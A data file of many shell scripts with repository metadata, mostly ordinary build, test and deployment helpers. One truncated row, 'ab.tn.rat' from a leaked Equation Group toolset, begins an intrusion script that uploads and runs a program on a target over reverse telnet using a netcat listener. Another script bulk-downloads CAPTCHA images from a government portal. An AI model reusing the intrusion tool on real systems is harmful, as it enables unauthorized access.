# ./2test.sh #test performance for data in default folder "corpus"
# ./2test.sh SilesiaCorpus #test performance for data in folder "SilesiaCorpus"
if [ -z ${basedir:-} ]; then
basedir="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
fi
if [ $# -lt 1 ]; then
indir=${basedir}/corpus... | true |
348eb8ae301da1add50ff97f41b216ca3120b8a0 | Shell | qrsforever/homebrain | /homebrain/build/platforms/kk/postbuild.sh | UTF-8 | 3,628 | 3.25 | 3 | [] | no_license | #!/bin/bash
#=================================================================
# date: 2018-05-30 13:47:20
# title: postbuild
#=================================================================
if [[ $# != 3 ]]
then
echo "Error, Use: prebuild.sh project_top_dir platform release_dir"
exit
fi
echo "======> postb... | true |
9975a033d7d503ed882fd7db1be576e38bf0fc9b | Shell | iotcloud/dsc-stream | /bin/test.sh | UTF-8 | 135 | 2.734375 | 3 | [] | no_license | #!/usr/bin/env bash
sizes=(16000 16000 32000)
for (( i = 0 ; i < ${#sizes[@]} ; i=$i+1 ));
do
echo $i
echo ${sizes[${i}]}
done | true |
347ce7d48858b6d4f133d1139b66df193896d6eb | Shell | devone2/kapor | /download.sh | UTF-8 | 230 | 3.03125 | 3 | [] | no_license | #!/bin/bash
n=${2:-100}
mkdir -p unlabeled
echo "Number to download: $n"
for ((i=0;i<$n;i++))
do
echo "Downloading image: $i"
wget "https://www.katasterportal.sk/kapor/Captcha.jpg" -O unlabeled/cap_$i.jpg
done;
| true |
ebfd1f75bf254820d24fa7e4624aec49f544386b | Shell | slymnsmh/EnterpriseFeatures | /Repositories/intern-api (old)/syncAll | UTF-8 | 1,007 | 3.546875 | 4 | [] | no_license | #!/bin/bash
if [ ! -f .vscode/sftp.json ]; then
echo "# Visual Studio Code SFTP config not found (.vscode/sftp.json)";
exit
fi
parse() {
grep $1 .vscode/sftp.json | awk {'print $2'} | sed 's/"//g' | sed 's/,//g'
}
jotform() {
echo " _ _ ___ "
echo " _ | |___| |_| __|__ _ _ _ __ "
ec... | true |
02ccf46bffb61a2ec1593a16b16285b7419784ff | Shell | QuantStack/jupyterlab | /scripts/release_test.sh | UTF-8 | 1,154 | 3.015625 | 3 | [
"BSD-3-Clause",
"MIT"
] | permissive | #!/usr/bin/env bash
# Test a release wheel in a fresh conda environment with and without installed
# extensions
# initialize the shell
set -ex
. $(conda info --base)/etc/profile.d/conda.sh
JLAB_TEST_ENV="${CONDA_DEFAULT_ENV}_test"
TEST_DIR=$(mktemp -d -t ${JLAB_TEST_ENV}XXXXX)
conda create --override-channels --str... | true |
24f14db2027d3b812cd07cb7f1925282f8999751 | Shell | amakukha/tmg | /src/tmg.sh | UTF-8 | 2,435 | 4.1875 | 4 | [
"BSD-2-Clause"
] | permissive | #!/bin/bash
# TMGL compilation script.
# For a given TMGL program it produces an executable.
# Corresponds to the original script `tmg`.
#
# While the original script relies on the UNIX assembler to produce the
# executable, this script calls the C compiler. It is a principal difference
# between this project and th... | true |
c3989e8364e6b5f4d202ae07348eb08c51026423 | Shell | fuglede/certificate-expiry-alarm | /check.sh.tmpl | UTF-8 | 325 | 2.9375 | 3 | [
"Apache-2.0"
] | permissive | #!/bin/sh
for host in $HOSTNAMES; do
openssl s_client -connect §host:443 -servername §host -showcerts 2>/dev/null </dev/null | openssl x509 -noout -checkend $SECONDSTOEXPIRY 1>/dev/null ||\
echo "Subject: Warning: §host certificate will expire soon" | sendmail -f "$FROMEMAIL" -F "$FROMNAME" $RECIPIENTS
don... | true |
667182b5b6bd1468b3b39b18751e856c1d534125 | Shell | CaliosD/xcode_tool | /count_code_lines.sh | UTF-8 | 205 | 2.546875 | 3 | [] | no_license | #! /bin/bash
# 使用方法: ./count_code_line.sh your_project_dir
find -s $1 "(" -name "*.m" -or -name "*.mm" -or -name "*.cpp" -or -name "*.h" -or -name "*.rss" ")" -print | xargs grep -v "^$"|wc -l
| true |
753fb88c7559da3993256424d9f96671ff8948f4 | Shell | justinledford/k-means-compression | /scripts/compressfromjpg.sh | UTF-8 | 1,016 | 3.828125 | 4 | [] | no_license | #!/bin/bash
# Convert JPEG to RGB, Compress RGB, decompress,
# then convert to JPEG to view results
#
# ImageMagick required
if [ "$#" -ne 4 ]; then
echo "Usage: ./compressfromjpg.sh k tile_w tile_h input"
exit
fi
K=$1
TILE_W=$2
TILE_H=$3
INPUT=$4
INPUT_RGB=`basename $INPUT | sed 's/\(.*\)\.jpg/\1.rgb/'`
OU... | true |
da4c9136e8a6e00e052c24e865bdd25578a34f6b | Shell | ingunnkw/comap | /src/f90/utils/setup_regions | UTF-8 | 4,171 | 4 | 4 | [] | no_license | #!/usr/bin/env bash
# Given a region definition file, a spectral definition file
# and an output beam, produces folders with smoothed maps and
# noise for each region, in sindex-ready format.
function showhelp {
echo "setup_regions [options] regions.fits data ncomp outbeam outprefix"
}
function rel2abs {
if [[ $1 =~ ... | true |
2156f4a2bee0341ff9696396e49bf3822b7bbc24 | Shell | pereorga/poedit | /deps/gettext/gettext-tools/tests/msgcat-stringtable-1 | UTF-8 | 1,825 | 3.265625 | 3 | [
"GPL-3.0-only",
"GPL-1.0-or-later",
"LGPL-2.1-or-later",
"MIT"
] | permissive | #! /bin/sh
. "${srcdir=.}/init.sh"; path_prepend_ . ../src
# Test reading in NeXTstep/GNUstep .strings syntax.
cat <<\EOF > mcat-s-1.in
/* This is an example of a string table file. Everything inside a comment
is completely ignored, even if in "quotes", or \escape characters, etc.
*/
"title" = "pattern II target 1";... | true |
258b9b45feecb58523f0e3b7222b8d859263692f | Shell | triforkse/microservices-infrastructure | /roles/zookeeper/files/zookeeper-wait-for-listen.sh | UTF-8 | 199 | 2.796875 | 3 | [
"Apache-2.0",
"LicenseRef-scancode-warranty-disclaimer"
] | permissive | #!/bin/bash
MAX_SECONDS=60
while /bin/true
do
[[ "$(echo ruok | nc "$HOSTNAME" 2181 2>/dev/null)" == "imok" ]] && exit 0 || sleep 1
[[ "$SECONDS" -ge "$MAX_SECONDS" ]] && exit 1
done
# EOF
| true |
d2e01db342a8e04b65b94f391bcd3947def3b4d3 | Shell | yamanalab/prv_cmp | /test/test.sh | UTF-8 | 196 | 2.671875 | 3 | [
"Apache-2.0"
] | permissive | #!/bin/bash
while read row; do
v1=`echo ${row} | cut -d , -f 1`
v2=`echo ${row} | cut -d , -f 2`
ex=`echo ${row} | cut -d , -f 3`
./run.sh ${v1} ${v2} ${ex}
done < testcase.csv
| true |
e228f38ce10389700dd2a381f0231385fbe2f4fa | Shell | Nari26/SourceCode | /docker/docker-install.sh | UTF-8 | 662 | 2.703125 | 3 | [] | no_license | ########################################
# Script to install docker on centos7
########################################
#!/bin/bash
# remove older version of docker (if any)
sudo yum remove docker docker-common docker-selinux docker-engine-selinux docker-engine docker-ce
# Next install needed packages
sudo yum insta... | true |
cf12ba202cae9423e0efbe16ce65eebedebdc864 | Shell | UofRLucyLu/cache-seq2seq-ulf-parser | /ulf-pipeline.sh | UTF-8 | 8,786 | 3.25 | 3 | [] | no_license | #!/bin/bash
# Exit on failure, since this is a pipeline...
set -e
#SBATCH -J oracle_run --time=2:00:00 --output=oracle.out --error=oracle.err
#SBATCH --mem=20GB
#SBATCH -c 4
# Packages.
module load java
module load python/2.7.12
module load tensorflow/1.4.1
# First split up the ULF data into sentences and ULFs.
DAT... | true |
9dbc61c118fc5c4e881f55f432dd0abdde1cda4d | Shell | paulmonk/dotfiles | /config/zsh/opts | UTF-8 | 3,986 | 3.203125 | 3 | [
"MIT"
] | permissive | #!/usr/bin/env zsh
#------------------------------------------------------------------------------
# ZSH Options
#------------------------------------------------------------------------------
# Remove the ^S ^Q mappings. See all mappings: stty -a
# Disable start/stop characters in shell editor.
stty ixany
stty ixoff ... | true |
51d06227a0af97568a1c5633e7be0459d913b09d | Shell | fullstory-morgue/configure-xawtv | /configure-xawtv | UTF-8 | 2,735 | 3.859375 | 4 | [] | no_license | #!/bin/bash
#
# Pre-Configure xawtv for sidux
#
# License: GPL
#
# Based on initial work by Kai Lahmann <kl@3dots.de>
#
# Patches and Debian package by Fabian Franz <knx-xawtv@fabian-franz.de>
#
# Spanish translation by Sergio González, <sergio.gonzalez@hispalinux.es>
#
#
#---------------------------------------------... | true |
5a42238dc62fdbf43376682dee02f1d507faf329 | Shell | FingerLeakers/EquationGroupLeak | /Linux/bin/ab.tn.rat | UTF-8 | 2,313 | 3.984375 | 4 | [] | no_license | #!/bin/sh
#
# Use ab to upload a program via reverse telnet and run it
#
# Some default values
SCRIPT="/tmp/.as1267/.s"
DIR="/tmp/.as1267"
version="1"
# Show usage and exit
usage() {
echo ""
echo "Before running this script, you first need to run the following:"
echo " nc -l -p localPort < file2Xfer... | true |
e3c8fdaf3404cbf522013021f5096548a39eef89 | Shell | enidastronomical/badusb | /Host-Content/run.sh | UTF-8 | 259 | 3 | 3 | [
"MIT"
] | permissive | #!/bin/sh
#set -x
#set -e
echo "Enter 's' for set up and 'd' for shut down > "
read action
if [ $action = "s" ]; then
echo "Set Up..."
ifconfig
./route.sh
elif [ $action = "d" ]; then
echo "Shut Down..."
./delAllDef.sh
else
echo "Invalid Command!"
fi
| true |
bd55322e0e43bfa02f68afc1555c99f3c85b5423 | Shell | delkyd/alfheim_linux-PKGBUILDS | /imlib2-webp-git/PKGBUILD | UTF-8 | 892 | 2.578125 | 3 | [] | no_license | # Maintainer: Steven Allen <steven@stebalien.com>
# COntributor: Ferk <ferkiwi at gmail.com>
# Contributor: Shizeeque Unadequatov <shizeeque@gmail.com>
pkgname=imlib2-webp-git
_gitname=imlib2-webp
pkgver=20131017
pkgrel=1
pkgdesc='A WebP loader for Imlib2. Enables WebP support for every application that uses the imlib... | true |
3c83d14bc5c806a05c2deff7f1c1ddd5f36906ce | Shell | thebridge0491/vm_templates_sh | /init/alpine/install.sh | UTF-8 | 12,316 | 3.3125 | 3 | [
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | #!/bin/sh -x
# nc -l [-p] {port} > file ## nc -w3 {host} {port} < file # netcat xfr
# ssh user@ipaddr "su -c 'sh -xs - arg1 argN'" < script.sh
# ssh user@ipaddr "sudo sh -xs - arg1 argN" < script.sh # w/ sudo
#sh /tmp/disk_setup.sh part_format sgdisk std vg0 pvol0
#sh /tmp/disk_setup.sh mount_filesystems std vg0
#... | true |
0f6f3b597c4b473cea6e56d8bb0a267a3496e60f | Shell | Deifinger/splitbill | /.laradock/roadrunner/roadrunner/commands.sh | UTF-8 | 549 | 3.625 | 4 | [
"MIT"
] | permissive | #!/usr/bin/env bash
# Input point ----------------------------------------------
readonly CONFIG="/etc/roadrunner/.rr.local.yml"
readonly RELATIVE_PATH=`dirname $0`
echo $0
main() {
local rule
if [[ $# -eq 0 ]]; then
rule=""
else
rule="$1"
shift
fi
local args="$@"
case "$rule" in
reset-wo... | true |
b2fa332666bd209c0a64a70e8852ca4331c2777e | Shell | xiaojinse/ECM | /GRE.sh | UTF-8 | 2,362 | 2.6875 | 3 | [] | no_license |
1. 配置网卡
# Use em7 on s03&s05 + em1 on S01&s02 as a GRE physical network path #
# IP: s01_em1:192.168.4.1/24 s02_em1:192.168.4.2/24 s03_em7:192.168.4.3/24 s05_em7: 192.168.4.5/24
ifconfig em1
ifconfig em7
# add IP address for em1 on s01/s02
vim /etc/network/interfaces
# on S01
#This NIC is used for MyLAB GRE tunn... | true |
253dd0d44f9c99c9203ceab41ce83c1243a55540 | Shell | AlexxNica/satellite-demo | /Docker/funcs.sh | UTF-8 | 890 | 4 | 4 | [
"MIT"
] | permissive | #!/bin/sh
info() {
echo "[INFO]" "$@" 1>&2
}
warn() {
echo "[WARN]" "$@" 1>&2
}
err() {
echo "[ERROR]" "$@" 1>&2
exit 1
}
assign_docker_command() {
which docker > /dev/null 2>&1 || err "You must have docker installed to build a docker image!"
DOCKER=$(which docker)
if ! docker ps > /dev/null 2>&1 ; ... | true |
aa839bbc57eaf3d2dcbb7d9a40f0b9a38f45d686 | Shell | miguelmota/dotfiles | /bin/monitor_hotplug | UTF-8 | 352 | 3.171875 | 3 | [
"MIT"
] | permissive | #!/bin/env bash
. ~/.functions
declare -i last_called=0
declare -i throttle_by=1
@throttle() {
local -i now=$(date +%s)
if (($now - $last_called >= $throttle_by))
then
"$@"
fi
last_called=$(date +%s)
}
while read line; do
if [[ $line = "SUBSYSTEM=drm" ]]; then
@throttle reload_desktop
fi
done ... | true |
badf999cbb1ccaf26fbf0eb5f8197982dd2db8da | Shell | jtulak/xfsdump-style-scripts | /9.sh | UTF-8 | 298 | 2.953125 | 3 | [
"MIT"
] | permissive | #!/usr/bin/env bash
set -euo pipefail
# there should be a single space inside of curly brackets
# add where missing "{foo}" and remove where too many "{ foo }"
find . -name '*.[ch]' ! -type d -exec bash -c '
sed -i \
-e "s/{\s*\(\S\)/{ \1/g" \
-e "s/\(\S\)\s*}/\1 }/g" \
$0
' {} \; | true |
aab36bc13dd2fa832ffbdbb5effc5ada9494f867 | Shell | garywu-cisco/yang-explorer | /reload.sh | UTF-8 | 312 | 3 | 3 | [
"Apache-2.0"
] | permissive | #!/bin/sh
if [ -f "v/bin/activate" ]; then
echo "Activating virtualenv .."
source v/bin/activate
fi
if [ ! -f "server/data/db.sqlite3" ]; then
echo "Database does not exist! Run setup.sh first!"
exit false
fi
echo "Reloading modules from CXML..."
cd server
python manage.py reload_cxml
cd ..
| true |
fa7f88d2649768819fd8010fde169b285bfef363 | Shell | linxi915/someDockerfile | /AutoSignMachine/default_task.sh | UTF-8 | 2,747 | 3.828125 | 4 | [] | no_license | #!/bin/sh
set -e
echo "定义定时任务合并处理用到的文件路径..."
defaultListFile="/pss/AutoSignMachine/$DEFAULT_LIST_FILE"
echo "默认文件定时任务文件路径为 ${defaultListFile}"
if [ $CUSTOM_LIST_FILE ]; then
customListFile="/pss/AutoSignMachine/$CUSTOM_LIST_FILE"
echo "自定义定时任务文件路径为 ${customListFile}"
fi
mergedListFile="/pss/AutoSignMachine/mer... | true |
1d28141af6eb36d916d02b5526cbffcebac96b4d | Shell | jtheo/ubuntu_wp_ha | /bootstrap-mgmt.sh | UTF-8 | 13,795 | 2.5625 | 3 | [
"MIT"
] | permissive | #!/usr/bin/env bash
# This is just a Proof of Concept, don't put passwords or ssh-keys on github :)
# Include file
echo "### hosts file"
cat <<EOF > /etc/hosts
127.0.1.1 $(hostname)
# vagrant environment nodes
192.168.123.10 mgmt
192.168.123.11 lb
192.168.123.21 wp1
192.168.123.22 wp2
192.168.123.31 be
E... | true |
1ecb0dd5bafb9d33edc30e4fc76bec954bd50a16 | Shell | GongT/containers | /factorio/fs/opt/scripts/start.sh | UTF-8 | 1,684 | 3.5 | 4 | [] | no_license | #!/usr/bin/bash
set -Eeuo pipefail
declare -r GAME_ROOT=/opt/factorio
if ! [[ "${DIST_TAG-}" ]]; then
declare -xr DIST_TAG="stable"
fi
declare -r GAME_INST="$GAME_ROOT/$DIST_TAG"
declare -r SAVE_FILE="/data/map.zip"
declare -r GAME_BIN="$GAME_INST/bin/x64/factorio"
if ! [[ -e $SAVE_FILE ]]; then
echo "map file ($S... | true |
f2ae9b414c7b078f4d5d6ce2fceda79d75424f17 | Shell | google-code/bluefrog-language-learning | /shell/4-6.sh | UTF-8 | 610 | 3.65625 | 4 | [] | no_license | #!/bin/bash
# wh whois 节点名字查询
# 把这个脚本重命名为'wh', 然后放到/usr/local/bin目录下.
# 需要符号链接:
# ln -s /usr/local/bin/wh /usr/local/bin/wh-ripe
# ln -s /usr/local/bin/wh /usr/local/bin/wh-cw
# ln -s /usr/local/bin/wh /usr/local/bin/wh-radb
E_NOARGS=65
if [ -z "$1" ]
then
echo "Usage: `basename $0` [domain-name]"
exit $E_NOARGS
f... | true |
a278b3fad6cbbc040f6f48cf982690bb46bf6a34 | Shell | stephenmsachs/fv3gfs | /ecf/ecfutils/CROW/model/fv3gfs/scripts/exglobal_fcst_crow_df.sh | UTF-8 | 7,831 | 2.96875 | 3 | [] | no_license | #!/bin/ksh
################################################################################
# UNIX Script Documentation Block
# Script name: exglobal_fcst_nemsfv3gfs.sh.ecf
# Script description: Runs a global FV3GFS model forecast
#
# Author: Fanglin Yang Org: NCEP/EMC Date: 2016-11-15
# Abstract... | true |
610d1e778abbc1c6dbf6fa7df700a39953b96c7b | Shell | WiFeng/ansible-archive | /roles/swiftq/templates/qpidagent | UTF-8 | 1,635 | 3.578125 | 4 | [] | no_license | #!/bin/bash
### BEGIN INIT INFO
# Provides: qpidagent
# Required-Start: $local_fs $remote_fs $network
# Required-Stop: $local_fs $remote_fs $network
# Default-Start: 3 4 5
# Default-Stop: 0 1 2 6
# Short-Description: start or stop qpidagent
# Description: Qpidd is an AMQP broker with a low performance at short connect... | true |
6d61cea6e93e9856e4208c78912609f7a5d54b85 | Shell | leosiqueira/betacast | /land-spinup/gen_datm/add-perturbs/driver-perturb-datm.sh | UTF-8 | 1,089 | 3.125 | 3 | [] | no_license | #!/bin/bash -l
#PBS -N forcing-gen
#PBS -A UNSB0017
#PBS -l select=1:ncpus=8:mpiprocs=8:mem=60GB
#PBS -l walltime=24:00:00
#PBS -q casper
ORIGPATH=/glade/u/home/zarzycki/scratch/ERA5-DATM/DATM-perturb3/
PERTURBPATH=/glade/u/home/zarzycki/scratch/ERA5-DATM/DATM-perturb4/
DIRTOSCRIPTS=./
NUMCORES=4
TIMESTAMP=`date +%... | true |
4b3424cb0fab0e910ad26861624da5b238d3e5dc | Shell | eDyablo/bashd | /log/log.sh | UTF-8 | 265 | 3.1875 | 3 | [] | no_license | #!/usr/bin/env bash
log_logger='log.logger.NULL'
log.logger.NULL() {
return
}
log.logger.STDOUT() {
read input
echo "${input}"
}
log.logger.FILES() {
read input
output=$(echo "${input}" | tee -a "${@}")
}
log.info() {
echo "${@}" | ${log_logger}
}
| true |
bd187d98567cdf75caf8c3b404abf655fceb2535 | Shell | andrejlevkovitch/simple_logs | /tools/colorizer | UTF-8 | 907 | 3.765625 | 4 | [] | no_license | #!/bin/bash
# colorize default logs for standard logs format
TERMINAL_NO_COLOR="\033[0m"
TERMINAL_BLUE="\033[1;34m"
TERMINAL_GREEN="\033[1;32m"
TERMINAL_YELLOW="\033[1;33m"
TERMINAL_RED="\033[1;31m"
MESSAGE_PREFIX="|"
while read -r line; do
severity=${line:0:3}
meta="${line% $MESSAGE_PREFIX *}"
meta="${meta:4... | true |
7fcc2aeba63f3977d5cc6f3b5f7ab50904e13501 | Shell | RC-MODULE/rcm-toolchain-builder | /symlink2copy.sh | UTF-8 | 605 | 3.984375 | 4 | [] | no_license | #!/bin/bash
skyforge_replace_symlink_with_copy()
{
link="$1"
if [ ! -L "$abstarget" ]; then
return
fi
dir=$(dirname "$link")
reltarget=$(readlink "$link")
if [[ $reltarget == /* ]]; then
abstarget=.$reltarget
else
abstarget=$dir/$reltarget
fi
rm -f "$link"
if [ -L "$abstarget" ]... | true |
b221b0fc6cf1446b62aaa20713786d8230d71416 | Shell | icantsayrural/pethereum | /deploy_contract.sh | UTF-8 | 347 | 3.46875 | 3 | [] | no_license | #!/bin/bash
if (( $# != 2 )); then
echo "Usage: ./deploy_contract.sh <data directory> <interval>"
exit 1
fi
data_dir=$1
interval=$2
# deploy contract
# ether shortage is OK, just move on
while [ 1 ]
do
echo "deploying contract ..."
geth --exec 'loadScript("contract.js")' attach $data_dir/geth.ipc
echo "don... | true |
aa0a034641cb766a7810ac8247e77d67dc13d0dc | Shell | whilesoftware/rapid-service-template | /scripts/init_admin.sh | UTF-8 | 1,153 | 3.953125 | 4 | [
"BSD-3-Clause"
] | permissive | #!/bin/bash
function die() {
ecode=$1
shift
if [ "$1" != "" ]; then
echo "$@" 1>&2
fi
exit $ecode
}
# move to the appropriate basedir
bash_source="${BASH_SOURCE[0]}"
basedir=$(dirname "$bash_source")
bdir="$basedir/.."
cd "$bdir" || die 1 "couldn't switch to expected basedir: $bdir"
# confirm that the... | true |
4df861df6c70847c9bfe07ad79513aba51c450db | Shell | electrocucaracha/grimoirelab | /_functions.sh | UTF-8 | 1,408 | 3.5 | 4 | [
"Apache-2.0"
] | permissive | #!/bin/bash
# SPDX-license-identifier: Apache-2.0
##############################################################################
# Copyright (c) 2019
# All rights reserved. This program and the accompanying materials
# are made available under the terms of the Apache License, Version 2.0
# which accompanies this distri... | true |
1e38b18cd7830d5a1cb6e82b1e1b62d61d9270d3 | Shell | xiaogangfan/framework | /git.sh | UTF-8 | 379 | 3.28125 | 3 | [] | no_license | #!/bin/bash
#git remote add origin git@github.com:xiaogangfan/framework.git
#check parameters
if [ "$#" -eq "1" ];then
echo "param:$1"
else
echo "Usage: `basename $0` first parameter"
echo "You provided $# parameters,but 1 are required."
exit 2
fi
#execute git command
git status
git add .
git commit -... | true |
94c568e73ad1f235e118e6fd4beb369ad59d5355 | Shell | mustafababil/terraform-precommit-hooks | /hooks/terraform-validate-full.sh | UTF-8 | 4,809 | 4.34375 | 4 | [
"MIT"
] | permissive | #!/usr/bin/env bash
set -e
export PATH=$PATH:/usr/local/bin
validate_main() {
parsed_command_line_arguments "$@"
run_validate
}
# Parse command line arguments
parsed_command_line_arguments() {
delimiter_flag="="
for arg in "$@"; do
echo "argument received --> [$arg]"
done
for i in "$@"; do
case ... | true |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.